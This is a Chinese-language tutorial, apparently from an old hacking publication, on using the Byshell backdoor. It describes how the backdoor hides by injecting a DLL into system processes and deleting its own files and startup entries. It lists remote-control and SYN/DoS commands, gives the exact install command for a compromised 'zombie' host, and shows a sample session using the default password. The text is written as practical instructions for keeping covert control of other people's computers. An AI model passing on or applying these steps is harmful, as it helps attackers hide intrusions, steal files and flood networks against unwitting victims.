Byshell后门:无进程无DLL无硬盘文件

　　应用举例

　　这是一个实现了无进程、无DLL、无硬盘文件、无启动项的后门程序。利用线程注射DLL到系统进程，解除DLL映射并删除自身文件和启动项，关机时恢复。大量地借鉴和学习了农民Cmdbind2的思想，在这里对农民前辈无私共享的精神致以120分感谢。我允许此软件及其源代码自由传播，但引用时应注明出处。在联系作者并得到同意之前，不得将此软件改编或删选后用作商业用途，可用作学习和私人用途。

　　Byshell 0.64支持的命令列表如下：cmd，shell，endshell，chpass，byver，sysinfo，pslist，pskill，modlist，get，put，reboot，dettach，popmsg，SYN，queryDOS，endDOS，refresh等，具体用法请查看说明书。

　　小提示：说明书上遗漏了refresh命令，它的作用是清除死掉的连接，并且给你机会重新连接，也可以在你换了一个IP以后，清除原来的连接（否则不能正常连接）。

　　安装后门时只要把Ntboot.exe和Ntboot.dll上传到肉鸡同一目录并且执行“ntboot.exe –install”即可，安装完成后可手动删除Ntboot.exe和Ntboot.dll，连接的时候用By064cli.exe。注意Byshell v0.64不支持本机对本机测试，v 0.63可以。现在我用v 0.63演示一下使用的效果：

　　1．连接：

　　please input the server ip address

　　127.0.0.1

　　127.0.0.1 will be connected

　　input the password(the default one is 'by')

　　by

　　#cmddir c:

　　驱动器 C 中的卷没有标签。

　　卷的序列号是 CCB2-D751

c: 的目录
　　
2005-01-29　14:22　　　 <DIR>　　　　　Documents and Settings
2004-10-01　19:24　　　 <DIR>　　　　　Inetpub
2004-11-17　20:56　　　 <DIR>　　　　　Intel
2004-10-30　14:18　　　　　　　 24,576 isapilog.dll
2004-11-11　00:55　　　　　　　 24,576 magic_asp.dll
2005-02-07　21:47　　　 <DIR>　　　　　My Music
2004-12-21　00:05　　　　　　　　　124 Operate.ini
2005-01-18　22:38　　　 <DIR>　　　　　Program Files
2005-02-07　23:31　　　 <DIR>　　　　　ubackup
2005-02-02　17:54　　　 <DIR>　　　　　WINNT
　　　　　　　 3 个文件　　　　 49,276 字节
　　　　　　　 7 个目录　　124,207,104 可用字节